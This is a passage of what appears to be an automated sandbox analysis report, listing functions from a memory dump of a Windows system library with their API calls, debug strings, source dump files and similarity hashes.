                                                                                                                            • Opcode Fuzzy Hash: a14493a1c29e3113a62c370174c65539b0e557d5cff0f881fca578d1669fb7de
                                                                                                                            • Instruction Fuzzy Hash: 80417935A00914A7DB10CF28E890BAEB3F5FF56711F5181AAED2987140EB38D946CBB1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D1390, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B1D1783: RtlAcquireSRWLockExclusive.1105(?,6B1D13C0,6B2AF288,00000044), ref: 6B1D1793
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,6B2AF288,00000044), ref: 6B1D1462
                                                                                                                              • Part of subcall function 6B1D1986: RtlIsValidIndexHandle.1105(?,?,00000000,?,?,6B1D13F2,6B2AF288,00000044), ref: 6B1D1995
                                                                                                                            • memcpy.1105(?,0000000E,?,6B2AF288,00000044), ref: 6B1D143D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireHandleIndexReleaseValidmemcpy
                                                                                                                            • String ID: #%u
                                                                                                                            • API String ID: 1422088098-232158463
                                                                                                                            • Opcode ID: d8cedace7703c0974ab3fb55480497eb9a84541ee54bb7425ff09699887d1299
                                                                                                                            • Instruction ID: 61b4141ea46c9c92323358cf6a87f72cb9c5d34c65b7eeea510a352686dd8e48
                                                                                                                            • Opcode Fuzzy Hash: d8cedace7703c0974ab3fb55480497eb9a84541ee54bb7425ff09699887d1299
                                                                                                                            • Instruction Fuzzy Hash: 8B41E271A10229DBDB10DFA8C880ADEB7F6AF85714F15406AE814EB781EB7DDC42CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D17B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,6B2AF2C8,00000018), ref: 6B1D17D7
                                                                                                                            • RtlGetIntegerAtom.1105(?,?,?,6B2AF2C8,00000018), ref: 6B1D17F3
                                                                                                                              • Part of subcall function 6B1D187D: _wcsicmp.1105(0000001C,?,?,?,00000000,?,?,?,?), ref: 6B1D1921
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,6B2AF2C8,00000018), ref: 6B1D185D
                                                                                                                              • Part of subcall function 6B1D1986: RtlIsValidIndexHandle.1105(?,?,00000000,?,?,6B1D13F2,6B2AF288,00000044), ref: 6B1D1995
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireAtomHandleIndexIntegerReleaseValid_wcsicmp
                                                                                                                            • String ID: Atom
                                                                                                                            • API String ID: 2453091922-2154973765
                                                                                                                            • Opcode ID: 49dd83abb3deb0764dac437917b8b1ac2413d70dfb84ddcd5d48ac48611a6771
                                                                                                                            • Instruction ID: 1c62f2473aac1f94750b6968784f8865c5fbf9c0e9a0c4e60833ca121bcd339c
                                                                                                                            • Opcode Fuzzy Hash: 49dd83abb3deb0764dac437917b8b1ac2413d70dfb84ddcd5d48ac48611a6771
                                                                                                                            • Instruction Fuzzy Hash: 9931A575E0022AEBDF00DFA48480AEEB3B9BF09744F11416AE864EB240D73CDD52D7A5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B264955, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B201D47: memset.1105(00000000,00000000,6B2217F0,?,00000001,00000000,?,6B1D8D70,00000000,?,?,00000030,?,?,00000001,?), ref: 6B201D87
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() found activation context data at %p with wrong format,RtlpQueryRunLevel,?,?,00000030,?,00000030,?,?,00000001,?,?), ref: 6B2649E1
                                                                                                                            Strings
                                                                                                                            • SXS: %s() found activation context data at %p with assembly roster that has no root, xrefs: 6B2649D9
                                                                                                                            • RtlpQueryRunLevel, xrefs: 6B2649D4, 6B2649FE
                                                                                                                            • SXS: %s() found activation context data at %p with wrong format, xrefs: 6B264A03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Printmemset
                                                                                                                            • String ID: RtlpQueryRunLevel$SXS: %s() found activation context data at %p with assembly roster that has no root$SXS: %s() found activation context data at %p with wrong format
                                                                                                                            • API String ID: 4188176266-4139752556
                                                                                                                            • Opcode ID: bbf839b1d7ed42b6ad3c1d1daac7d56f3ef86d59deb673028ea5e8e81fd51658
                                                                                                                            • Instruction ID: 929de27ab80ed5cfae9e7a5e2f1be35cd7b94b8728d0f8d4a8d8f4e9adea3113
                                                                                                                            • Opcode Fuzzy Hash: bbf839b1d7ed42b6ad3c1d1daac7d56f3ef86d59deb673028ea5e8e81fd51658
                                                                                                                            • Instruction Fuzzy Hash: 59210A72A44315AFC315CE08C8D5E47B7DDEBC5358F05425EF8949B241E734ED80C6A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2940DC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0FE0), ref: 6B294110
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                            • String ID: RtlSetUserValueHeap
                                                                                                                            • API String ID: 3446177414-1142157168
                                                                                                                            • Opcode ID: 094e74d0195dda8b7852d139204f5b6dd68291f12673160e3582f26990f0bf38
                                                                                                                            • Instruction ID: 78d23a85dd1bc68e6c1d74286a04fedb51b9a3a150a008628c425e00b0ad9298
                                                                                                                            • Opcode Fuzzy Hash: 094e74d0195dda8b7852d139204f5b6dd68291f12673160e3582f26990f0bf38
                                                                                                                            • Instruction Fuzzy Hash: 7B21C43090025DAFDF21EFB988857DEBFF2AF55358F048058E4786B281CB794A45CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B29387C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20), ref: 6B2938B3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                            • String ID: RtlGetUserInfoHeap
                                                                                                                            • API String ID: 3446177414-1656697243
                                                                                                                            • Opcode ID: 012df94f41c00bb542fde55f656c7426c66a8d3a7b32147c7971b020af2c9bab
                                                                                                                            • Instruction ID: c46444e329077308a074a563f3ab5bfdc16414a3023d1f99f98953f0ba3a5284
                                                                                                                            • Opcode Fuzzy Hash: 012df94f41c00bb542fde55f656c7426c66a8d3a7b32147c7971b020af2c9bab
                                                                                                                            • Instruction Fuzzy Hash: A021B23090425DAFDF21AFB98484BDEBFF1BF06354F048448E49C6B191C7798A45CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B294212, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,6B2C79A0,6B2B0EA8,00000024,6B246051,?,?,00000000,00000000,?,?,6B203347,?,00000000,?), ref: 6B29423F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                            • String ID: RtlSizeHeap
                                                                                                                            • API String ID: 3446177414-202636049
                                                                                                                            • Opcode ID: ebd1c19244ad531c77a841089f1c146bea6d63fed563c20839815e9d812d6c2c
                                                                                                                            • Instruction ID: 7c738e39fd7889c8e767a895abcb3bcfeadd4658a7924cd11a22153f481f7d09
                                                                                                                            • Opcode Fuzzy Hash: ebd1c19244ad531c77a841089f1c146bea6d63fed563c20839815e9d812d6c2c
                                                                                                                            • Instruction Fuzzy Hash: B221D030D1021DABDB20DBB9C5857DEBBF0AF45318F108248D438671D0C7795A45CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B253E13, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • wcschr.1105(?,0000002C,?,?,00000000,?,?,6B23060B), ref: 6B253E23
                                                                                                                            • wcstoul.1105(-00000002,6B23060B,00000010,?,?,00000000,?,?,6B23060B), ref: 6B253E3D
                                                                                                                            • DbgPrintEx.1105(00000055,00000003,CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X,?,?,00000000,?,?,6B23060B), ref: 6B253E5A
                                                                                                                              • Part of subcall function 6B253C93: wcschr.1105(?,0000003D,00000000,?), ref: 6B253CAC
                                                                                                                              • Part of subcall function 6B253C93: RtlInitUnicodeString.1105(?,-00000002,00000000,?), ref: 6B253CD0
                                                                                                                              • Part of subcall function 6B253C93: RtlAnsiStringToUnicodeString.1105(?,?,00000001,00000000,?), ref: 6B253D72
                                                                                                                              • Part of subcall function 6B253C93: RtlCompareUnicodeString.1105(?,?,00000001,?,?,00000001,00000000,?), ref: 6B253D89
                                                                                                                              • Part of subcall function 6B253C93: RtlFreeUnicodeString.1105(?,00000000,?), ref: 6B253DED
                                                                                                                            Strings
                                                                                                                            • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 6B253E51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Unicode$wcschr$AnsiCompareFreeInitPrintwcstoul
                                                                                                                            • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X
                                                                                                                            • API String ID: 2652356044-1863042022
                                                                                                                            • Opcode ID: 7de74d8141eb1e8c6015412286414bd55b95552204f7b2ba16a8f3a8bc44dd0f
                                                                                                                            • Instruction ID: 55a74b2d29f05c62f0eea5125cc5fe91d9af5b956df00566e99328b078591777
                                                                                                                            • Opcode Fuzzy Hash: 7de74d8141eb1e8c6015412286414bd55b95552204f7b2ba16a8f3a8bc44dd0f
                                                                                                                            • Instruction Fuzzy Hash: AAF0F63320021837E6285369EC87FA727DCCF85A61F10015DFA199B282EA699D5181F0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20BDFC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C79E4,6B2C8654,00000000,?,6B210492,00000000,?,6B210459,6B2C8654,?,?,?,6B21042F,?,6B1EECE6,6B2C84D8), ref: 6B20BE09
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C79E4,6B2C79E4,6B2C8654,00000000,?,6B210492,00000000,?,6B210459,6B2C8654,?,?,?,6B21042F,?,6B1EECE6), ref: 6B20BE33
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C79E4,6B2C79E4,6B2C8654,00000000,?,6B210492,00000000,?,6B210459,6B2C8654,?,?,?,6B21042F,?,6B1EECE6), ref: 6B20BE58
                                                                                                                              • Part of subcall function 6B20BE62: ZwProtectVirtualMemory.1105(000000FF,?,00000000,-00000F38,-00000F38,?), ref: 6B20BE97
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$AcquireMemoryProtectVirtual
                                                                                                                            • String ID: y,k
                                                                                                                            • API String ID: 1407556199-2469298647
                                                                                                                            • Opcode ID: 7496b3f248e7398e1f388e11dea83e073389cb35872a9613c8b8a064d96c52a6
                                                                                                                            • Instruction ID: 8412a72d2918686db0dda056d0e63ed95be5af0ff260f0d04cf9cd6eba65ca07
                                                                                                                            • Opcode Fuzzy Hash: 7496b3f248e7398e1f388e11dea83e073389cb35872a9613c8b8a064d96c52a6
                                                                                                                            • Instruction Fuzzy Hash: B6F09673C8025C22D731563554CDB2B67A88BA2F75F914156EF541B1D18F6C8C438296
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D1FA1, Relevance: 6.3, APIs: 4, Instructions: 266COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.1105(?,?,00000000,?,?,?), ref: 6B1D20AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3510742995-0
                                                                                                                            • Opcode ID: 3043db63674a6c56d12890bda37d5ce3dadd3304bf3f28ca0ae160aa464009a5
                                                                                                                            • Instruction ID: dc39b244566332acaf5274b9afed4be2250c86f7913c18c4b2d932fd9b4d5301
                                                                                                                            • Opcode Fuzzy Hash: 3043db63674a6c56d12890bda37d5ce3dadd3304bf3f28ca0ae160aa464009a5
                                                                                                                            • Instruction Fuzzy Hash: 0BA17F71A0011D9BDF25CE28C880BEA73F9BF94714F1185E99969D3280DF799A82CFD1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D11E0, Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • iswctype.1105(0000000A,00000004), ref: 6B1D1244
                                                                                                                            • iswctype.1105(00000000,00000004), ref: 6B22EC6A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: iswctype
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 304682654-0
                                                                                                                            • Opcode ID: b9ff7f4b745e4673cc31772c047813b7fd0af9ef3e1ed656c5ae30f024cc79f1
                                                                                                                            • Instruction ID: ba5dc5a75cbbac24c374b8ea082a969d47479cfa09b0dfbfe4d70784554deb95
                                                                                                                            • Opcode Fuzzy Hash: b9ff7f4b745e4673cc31772c047813b7fd0af9ef3e1ed656c5ae30f024cc79f1
                                                                                                                            • Instruction Fuzzy Hash: 3A71FF71E0412A9BDB18CEA8C491AFEB7F2AB45311F20456AE891E73C4D73E9950C760
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D1E50, Relevance: 6.2, APIs: 4, Instructions: 169COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlNtStatusToDosError.1105(C000000D,?,00000000,6B2AF330,00000018), ref: 6B22F223
                                                                                                                            • RtlNtStatusToDosError.1105(C000000D), ref: 6B22F2A6
                                                                                                                            • RtlEnterCriticalSection.1105(?), ref: 6B22F2BB
                                                                                                                            • RtlNtStatusToDosError.1105(C000000D), ref: 6B22F2E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorStatus$CriticalEnterSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 152543406-0
                                                                                                                            • Opcode ID: 2a954aec1c35324811e44a913e8e238001364467b80bf8ca7bf393b031b75ae3
                                                                                                                            • Instruction ID: 1ae6e95bea398843b3d8583f711d9cb3d631a662b37ea6f9fe938d09482f9792
                                                                                                                            • Opcode Fuzzy Hash: 2a954aec1c35324811e44a913e8e238001364467b80bf8ca7bf393b031b75ae3
                                                                                                                            • Instruction Fuzzy Hash: 8951E371A0079AAFDB05CF64C580BAB77F1AF4A708F0086A9D86597780C73CAC55CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B208ED7, Relevance: 6.1, APIs: 4, Instructions: 110libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • wcsrchr.1105(?,0000005C,00000000,00000000,00000000), ref: 6B208F1B
                                                                                                                            • memcpy.1105(?,?,?,00000000,00000000,00000000), ref: 6B208F72
                                                                                                                            • LdrFindEntryForAddress.1105(?,?,00000000,00000000,00000000), ref: 6B208F9D
                                                                                                                            • memcpy.1105(?,?,00000004,?,?,00000000,00000000,00000000), ref: 6B208FD3
                                                                                                                              • Part of subcall function 6B2092FC: RtlEnterCriticalSection.1105(6B2C6D80,6B2B0158,00000018,6B1D63DB), ref: 6B209331
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$AddressCriticalEnterEntryFindSectionwcsrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3299649961-0
                                                                                                                            • Opcode ID: c6ea268ef8c8fcab1552981f2e0ff5c81db2efd0c6554e3dd484ce8b91997272
                                                                                                                            • Instruction ID: 0e2e1fd74380c47f4e371e4708d1b18782c7d3700308cea0d3c803949d50c775
                                                                                                                            • Opcode Fuzzy Hash: c6ea268ef8c8fcab1552981f2e0ff5c81db2efd0c6554e3dd484ce8b91997272
                                                                                                                            • Instruction Fuzzy Hash: 6931B37220470A9FD705CF28C894A6BB7E2FF84711F588529F9558B691DB34D820C795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2AED52, Relevance: 6.1, APIs: 4, Instructions: 110timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C8684,6B2C8668,?,?,6B2C8668,6B2C8668,?,6B2AE5F4,?,80000002,6B2C8668,6B2C8660), ref: 6B2AEDA9
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C8684,6B2C8684,6B2C8668,?,?,6B2C8668,6B2C8668,?,6B2AE5F4,?,80000002,6B2C8668,6B2C8660), ref: 6B2AEE42
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,6B2C8684,6B2C8684,6B2C8668,?,?,6B2C8668,6B2C8668,?,6B2AE5F4,?,80000002,6B2C8668,6B2C8660), ref: 6B2AEE50
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C8684,6B2C8684,6B2C8668,?,?,6B2C8668,6B2C8668,?,6B2AE5F4,?,80000002,6B2C8668,6B2C8660), ref: 6B2AEE5B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$AcquireDebugPrintTimes
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 309489879-0
                                                                                                                            • Opcode ID: a7c3cb24d560bc1bdf067906c938ab28ab4f73235dea251411e81e819f6d7ec2
                                                                                                                            • Instruction ID: 3715dc3b33687143cdf961292d463f6d7f431843a898d85d5ddfa3f82f50ed97
                                                                                                                            • Opcode Fuzzy Hash: a7c3cb24d560bc1bdf067906c938ab28ab4f73235dea251411e81e819f6d7ec2
                                                                                                                            • Instruction Fuzzy Hash: E3310976A104299B8B18DF19CCD0569F7F5EF8932032442ADE816CB795DB38ED02CBC0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FECE0, Relevance: 6.1, APIs: 4, Instructions: 103timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,00000000,00000000), ref: 6B1FED2C
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,00000000,00000000,?,00000000,00000000), ref: 6B1FED90
                                                                                                                            • TpSetWaitEx.1105 ref: 6B2442DE
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,00000000,00000000,?,00000000,00000000), ref: 6B24432F
                                                                                                                              • Part of subcall function 6B1FFC39: ZwAssociateWaitCompletionPacket.1105(?,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,00000000), ref: 6B1FFC71
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLockWait$AcquireAssociateCompletionDebugPacketPrintReleaseTimes
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1549838691-0
                                                                                                                            • Opcode ID: 3095a9aee3c3b92e80b7f3b599588ef7ec57f049456e71fd9b5cfe604dd01e1e
                                                                                                                            • Instruction ID: 0c936caa9e67bea7b0adc870d3b5f880e079f9440ab6d062940f1b6b60f90cdb
                                                                                                                            • Opcode Fuzzy Hash: 3095a9aee3c3b92e80b7f3b599588ef7ec57f049456e71fd9b5cfe604dd01e1e
                                                                                                                            • Instruction Fuzzy Hash: FE31B27665065BABC714CF34C84079AB7E9BF85315F050529D869C7640DB38E912CBD1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28C08A, Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,?,?,?,00000001,?,?,?,6B28BC33,?,C0000002,00000020,?,?), ref: 6B28C0CA
                                                                                                                            • memcpy.1105(0000000C,?,?,?,?,?,?,?,?,00000001,?,?,?,6B28BC33,?,C0000002), ref: 6B28C115
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,?,?,00000001,?,?,?,6B28BC33,?,C0000002,00000020,?), ref: 6B28C17F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
